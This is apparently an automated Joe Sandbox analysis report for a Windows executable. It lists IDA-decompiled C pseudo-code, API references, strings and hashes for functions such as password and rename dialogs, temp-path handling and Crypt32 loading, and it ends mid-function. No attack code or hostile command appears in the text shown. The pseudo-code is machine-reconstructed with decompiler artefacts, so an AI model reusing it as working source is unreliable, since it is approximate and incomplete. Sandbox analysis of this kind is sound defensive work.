0x00e7cb9a
0x00e7cba1
0x00e7cba6
0x00e7cbae
0x00e7cbba
0x00e7cbba
0x00e7cbc7
0x00e7cbcc
0x00e7cbd4
0x00e7cbde
0x00e7cbeb
0x00e7cbf2
0x00e7cbf2
0x00e7cbff
0x00e7cc06
0x00e7cc0b
0x00e7cc13
0x00e7cc19
0x00e7cc1b
0x00e7cc1b
0x00e7cc30
0x00e7cc35
0x00e7cc41
0x00e7cc43
0x00e7cc54
0x00e7cc61
0x00000000
0x00e7cc45
0x00e7cc45
0x00e7cc50
0x00e7cc52
0x00e7cc66
0x00e7cc66
0x00e7cc72
0x00e7cc7f
0x00e7cc8b
0x00e7cc92
0x00e7cc97
0x00e7cc9e
0x00e7cca4
0x00e7cca6
0x00e7ccac
0x00e7ccb2
0x00e7ccb4
0x00e7ccbd
0x00e7ccc0
0x00e7ccc2
0x00e7cccb
0x00e7ccce
0x00e7ccd4
0x00e7ccd7
0x00e7cce0
0x00e7ccef
0x00e7ccf4
0x00e7ccfb
0x00e7ccfe
0x00e7cd0c
0x00e7cd0c
0x00000000
0x00e7ccfb
0x00000000
0x00e7cc52
0x00e7cc43
0x00000000
0x00e7cd14
0x00e7cd14
0x00e7cd17
0x00e7cd19
0x00e7cd19
0x00000000
0x00000000
0x00e7c65d
0x00e7c65d
0x00e7c665
0x00e7c66b
0x00e7c66e
0x00e7c692
0x00e7c670
0x00e7c670
0x00e7c673
0x00e7c686
0x00e7c675
0x00e7c675
0x00e7c677
0x00e7c67c
0x00e7c67c
0x00e7c673
0x00000000
0x00000000
0x00e7c799
0x00e7c799
0x00e7c79a
0x00e7c79f
0x00e7c79f
0x00e7c79f
0x00e7c7a2
0x00e7c7a7
0x00e7c7ad
0x00e7c7ad
0x00e7c7b3
0x00e7c7b9
0x00e7c7b9
0x00000000
0x00000000
0x00e7c0e8
0x00e7c0e8
0x00e7c0ed
0x00e7c0ee
0x00e7c0ef
0x00e7c0f4
0x00e7c0fa
0x00e7c0fd
0x00000000
0x00e7c0ff
0x00e7c0ff
0x00000000
0x00e7c0ff
0x00e7c0fd
0x00e7cd51
0x00e7cd57
0x00e7cd61
0x00e7cd61
0x00e7c841
0x00e7c841
0x00e7c848
0x00000000
0x00000000
0x00e7c84e
0x00e7c84e
0x00e7c850
0x00e7c857
0x00e7c85f
0x00e7c860
0x00e7c865
0x00e7c866
0x00e7c867
0x00e7c869
0x00e7c8bd
0x00e7c8bd
0x00e7c8c5
0x00e7c8d3
0x00e7c8e4
0x00e7c8f2
0x00e7c8f2
0x00e7c8fe
0x00e7c903
0x00e7c905
0x00e7c915
0x00e7c91f
0x00e7c924
0x00e7c927
0x00000000
0x00e7c92d
0x00e7c92d
0x00e7c932
0x00e7c932
0x00e7c934
0x00e7c93b
0x00e7c941
0x00000000
0x00e7c941
0x00e7c927
0x00e7c86b
0x00e7c86d
0x00e7c86f
0x00e7c876
0x00000000
0x00000000
0x00e7c878
0x00e7c878
0x00e7c87a
0x00e7c880
0x00e7c880
0x00e7c880
0x00e7c884
0x00000000
0x00000000
0x00e7c886
0x00e7c886
0x00e7c887
0x00e7c88d
0x00e7c890
0x00e7c892
0x00e7c895
0x00000000
0x00000000
0x00e7c897
0x00000000
0x00e7c897
0x00e7c899
0x00e7c8a4
0x00e7c8ae
0x00e7c8b3
0x00e7c8b3
0x00e7c8b5
0x00000000
0x00e7c947
0x00e7c947
0x00e7c94a
0x00e7c950
0x00e7c957
0x00e7c959
0x00e7c959
0x00e7c963
0x00e7c963
0x00000000
0x00e7c94a

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00E7C7D9
_swprintf.LIBCMT ref: 00E7C80D

Part of subcall function 00E63F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E63FA2

SetDlgItemTextW.USER32(?,00000066,00EA946A), ref: 00E7C82D
EndDialog.USER32(?,00000001), ref: 00E7C941

Strings

%s%s%u, xrefs: 00E7C802

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf
String ID: %s%s%u
API String ID: 3182297613-1360425832
Opcode ID: 6f911187ea31c6d05d5d103d187b98c5df51181d10755deb1ef883635292c8cb
Instruction ID: 3e0fec2d029cb7fc0fdb486619e6259b3b191fab3a1b59aad7c888b7bb548ce3
Opcode Fuzzy Hash: 6f911187ea31c6d05d5d103d187b98c5df51181d10755deb1ef883635292c8cb
Instruction Fuzzy Hash: AE416271D00618AEDB26DBA0DC85EDA77BCEB48305F1090AAE60DF6161E771AAC4CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8C3F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E00E8C3F8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t34 ^ _t70;
				E00E840A6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x8fe85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00E7EEFA(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00E7F5F0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00E8A5D0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00E88838(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00E91D00();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x00e8c400
0x00e8c407
0x00e8c413
0x00e8c418
0x00e8c41d
0x00e8c422
0x00e8c422
0x00e8c425
0x00e8c427
0x00e8c427
0x00e8c42c
0x00e8c445
0x00e8c44b
0x00e8c450
0x00e8c4ef
0x00e8c4f3
0x00e8c4f8
0x00e8c4f8
0x00e8c514
0x00e8c514
0x00e8c456
0x00e8c45e
0x00e8c462
0x00e8c4ae
0x00e8c4b0
0x00e8c4b2
0x00e8c4b7
0x00e8c4ce
0x00e8c4d6
0x00e8c4e6
0x00e8c4e6
0x00e8c4d6
0x00e8c4e8
0x00e8c4e9
0x00000000
0x00e8c4ee
0x00e8c469
0x00e8c46b
0x00e8c46d
0x00e8c475
0x00e8c492
0x00e8c49c
0x00e8c4a1
0x00000000
0x00000000
0x00e8c4a3
0x00e8c4a9
0x00e8c4a9
0x00000000
0x00e8c4a9
0x00e8c479
0x00e8c47d
0x00e8c482
0x00e8c486
0x00000000
0x00000000
0x00e8c488
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8FE85006,00E84236,00000000,00000000,00E8526B,?,kR,?,00000001,00E84236,8FE85006,00000001,00E8526B,00E8526B), ref: 00E8C445
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E8C4CE
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E8C4E0
__freea.LIBCMT ref: 00E8C4E9

Part of subcall function 00E88838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E83CF6,?,0000015D,?,?,?,?,00E851D2,000000FF,00000000,?,?), ref: 00E8886A

Strings

kR, xrefs: 00E8C40B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID: kR
API String ID: 2652629310-1039637683
Opcode ID: 7e5db32b39b6a259d4a1166a9f5d5ac84643dc33bf541442533503a31eee7d64
Instruction ID: a109702f9a52d2623d0cd4240d3bbb17d71d843ac16439b9b42b0ee1ee0ba0c9
Opcode Fuzzy Hash: 7e5db32b39b6a259d4a1166a9f5d5ac84643dc33bf541442533503a31eee7d64
Instruction Fuzzy Hash: D931FE72A0021AAFDF24AF65DC51DBE7BA5EB01314F254169FC1CE6290EB35CD94CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AC20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E7AC20(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00E6130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00E6EF88(_t24, 0xeb6a78,  &_v260);
					E00E6EFD3( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00e7ac2a
0x00e7ac2e
0x00e7ac32
0x00e7ac4b
0x00e7acba
0x00000000
0x00e7acbc
0x00e7ac4d
0x00e7ac53
0x00e7acb4
0x00000000
0x00e7acb4
0x00e7ac58
0x00e7ac67
0x00000000
0x00e7ac67
0x00e7ac5d
0x00e7ac60
0x00e7ac86
0x00e7ac98
0x00e7aca5
0x00e7acaa
0x00e7ac6d
0x00e7ac6e
0x00000000
0x00e7ac6e
0x00e7ac65
0x00e7ac6b
0x00000000
0x00e7ac6b
0x00000000

APIs

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

EndDialog.USER32(?,00000001), ref: 00E7AC6E
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E7AC86
SetDlgItemTextW.USER32(?,00000067,?), ref: 00E7ACB4

Strings

GETPASSWORD1, xrefs: 00E7AC39
xj, xrefs: 00E7AC92

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xj
API String ID: 445417207-2429949757
Opcode ID: e90e508ce0a57e19304827528518da137780c1846213f64eb2a6f34bd8959d88
Instruction ID: 29e3e805a6c4fdfd237f325bbf708c745c397b16e97dfe5fcac86634f0f9e5b8
Opcode Fuzzy Hash: e90e508ce0a57e19304827528518da137780c1846213f64eb2a6f34bd8959d88
Instruction Fuzzy Hash: 731148329801187BDB239A649C49FFFBB7CEB89700F089034FB49B31C0C262994587A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E7B07D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7B07D(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xea0ed0, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t21 != 0) {
					_t24 = E00E7A07C(0x65);
				}
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
				} else {
					GetObjectW(_t24, 0x18,  &_v28);
				}
				if(E00E79F7A(_t31) != 0) {
					if(_t21 != 0) {
						_t28 = E00E7A07C(0x66);
						if(_t28 != 0) {
							DeleteObject(_t24);
							_t24 = _t28;
						}
					}
					_t11 = E00E79FBA(_v20);
					_t13 = E00E7A1BD(_t23, _t35, _t24, E00E79F99(_v24), _t11);
					DeleteObject(_t24);
					_t24 = _t13;
				}
				return _t24;
			}

0x00e7b07d
0x00e7b07d
0x00e7b093
0x00e7b097
0x00e7b09c
0x00e7b0a5
0x00e7b0a5
0x00e7b0a7
0x00e7b0a9
0x00e7b0ba
0x00e7b0c1
0x00e7b0ab
0x00e7b0b2
0x00e7b0b2
0x00e7b0cf
0x00e7b0d4
0x00e7b0dd
0x00e7b0e1
0x00e7b0e4
0x00e7b0ea
0x00e7b0ea
0x00e7b0e1
0x00e7b0ef
0x00e7b0ff
0x00e7b107
0x00e7b10d
0x00e7b10f
0x00e7b117

APIs

LoadBitmapW.USER32(00000065), ref: 00E7B08D
GetObjectW.GDI32(00000000,00000018,?), ref: 00E7B0B2
DeleteObject.GDI32(00000000), ref: 00E7B0E4
DeleteObject.GDI32(00000000), ref: 00E7B107

Part of subcall function 00E7A07C: FindResourceW.KERNEL32(00E7B0DD,PNG,?,?,?,00E7B0DD,00000066), ref: 00E7A08E
Part of subcall function 00E7A07C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0A6
Part of subcall function 00E7A07C: LoadResource.KERNEL32(00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0B9
Part of subcall function 00E7A07C: LockResource.KERNEL32(00000000,?,?,?,00E7B0DD,00000066), ref: 00E7A0C4

Strings

], xrefs: 00E7B0BA

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: 63f9f45be4dbedbdeec82744141b1351cc7e44cf5fc5e1392bcd9ca754bf85f7
Instruction ID: ee7d26dacc4095aa807db3d0dbb7ed31c2cc4fb6178399466af89ee13574e41a
Opcode Fuzzy Hash: 63f9f45be4dbedbdeec82744141b1351cc7e44cf5fc5e1392bcd9ca754bf85f7
Instruction Fuzzy Hash: 48012632941206EBC72137659C0AFBF7AAEAF81751F089025FD08F7291CF338C1582A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E7CF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E7CF50(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00E6130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xebecac = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xebecac);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xebecac, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00e7cf51
0x00e7cf56
0x00e7cf5b
0x00e7cf60
0x00e7cf78
0x00e7cfda
0x00000000
0x00e7cfdc
0x00e7cf7a
0x00e7cf80
0x00e7cfbf
0x00e7cfc5
0x00e7cfd4
0x00000000
0x00e7cfd4
0x00e7cf85
0x00e7cf94
0x00000000
0x00e7cf94
0x00e7cf8a
0x00e7cf8d
0x00e7cfb1
0x00e7cfb7
0x00e7cf9a
0x00e7cf9b
0x00000000
0x00e7cf9b
0x00e7cf92
0x00e7cf98
0x00000000
0x00e7cf98
0x00000000

APIs

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

EndDialog.USER32(?,00000001), ref: 00E7CF9B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E7CFB1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00E7CFC5
SetDlgItemTextW.USER32(?,00000068), ref: 00E7CFD4

Strings

RENAMEDLG, xrefs: 00E7CF68

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 0061a61eaba0d84ac1ca2e020f90ea93197eb865263ede05a8696a3c196953cb
Instruction ID: 16117236752a13f8cda73b77364c795d1d7e719b3b055f732f04ca1e9afb7965
Opcode Fuzzy Hash: 0061a61eaba0d84ac1ca2e020f90ea93197eb865263ede05a8696a3c196953cb
Instruction Fuzzy Hash: 4A0168323853007ED6144B659C08FAB7BEEEB59706F20941DF306B21E0C662580A8B75

Uniqueness

Uniqueness Score: -1.00%

Function 00E87893 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E87844,?,?,00E877E4,?,00E9BAD8,0000000C,00E8793B,?,00000002), ref: 00E878B3
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E878C6
FreeLibrary.KERNEL32(00000000,?,?,?,00E87844,?,?,00E877E4,?,00E9BAD8,0000000C,00E8793B,?,00000002,00000000), ref: 00E878E9

Strings

mscoree.dll, xrefs: 00E878AC
CorExitProcess, xrefs: 00E878BE

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: daae4dbebe400ea96e07ccecabf4d6c2dba8fafebd3533ecc2a7dfc2b08d24cb
Instruction ID: 3101ea88430a46a3d0749b01fd3ef4ec52df05a35d2a9f10d66734f10628fe7c
Opcode Fuzzy Hash: daae4dbebe400ea96e07ccecabf4d6c2dba8fafebd3533ecc2a7dfc2b08d24cb
Instruction Fuzzy Hash: 2DF0AF31A04218BFCB15ABA6DC09B9EBFB8EF04755F10406AF809B2260DB718E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6EE4E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E6EE4E(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00E70360(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x00e6ee4f
0x00e6ee55
0x00e6ee5c
0x00e6ee61
0x00e6ee65
0x00e6ee7a
0x00e6ee7d
0x00e6ee83
0x00e6ee83
0x00e6ee86
0x00000000
0x00e6ee86
0x00e6ee8b

APIs

Part of subcall function 00E70360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E7037B
Part of subcall function 00E70360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E6EE61,Crypt32.dll,00000000,00E6EEE5,?,?,00E6EEC7,?,?,?), ref: 00E7039D

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E6EE6D
GetProcAddress.KERNEL32(00EA81C0,CryptUnprotectMemory), ref: 00E6EE7D

Strings

CryptProtectMemory, xrefs: 00E6EE67
Crypt32.dll, xrefs: 00E6EE57
CryptUnprotectMemory, xrefs: 00E6EE73

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: ef8024524d481d1ac9647e076ddc7b1a011b84429313721cc8b9d4199c6f6fa4
Instruction ID: 3b1f16c6501c4b20d9de6ddc4ad000d9c45b2f93f4ebd9aa28656f5f7aa5150b
Opcode Fuzzy Hash: ef8024524d481d1ac9647e076ddc7b1a011b84429313721cc8b9d4199c6f6fa4
Instruction Fuzzy Hash: 30E04F78850741AECB305F35A809747BAE46B14714F00E81EE48AF3684D6F6D5448B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E880C8 Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00E880C8(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xe9e668; // 0x8ae5c3d8
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00E87F89( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00E83429(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00E83429(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00E83429(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00E8BA23(_t56);
						_t40 = E00E887FE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00E8BA23(_t56);
						E00E887FE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xe9e668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
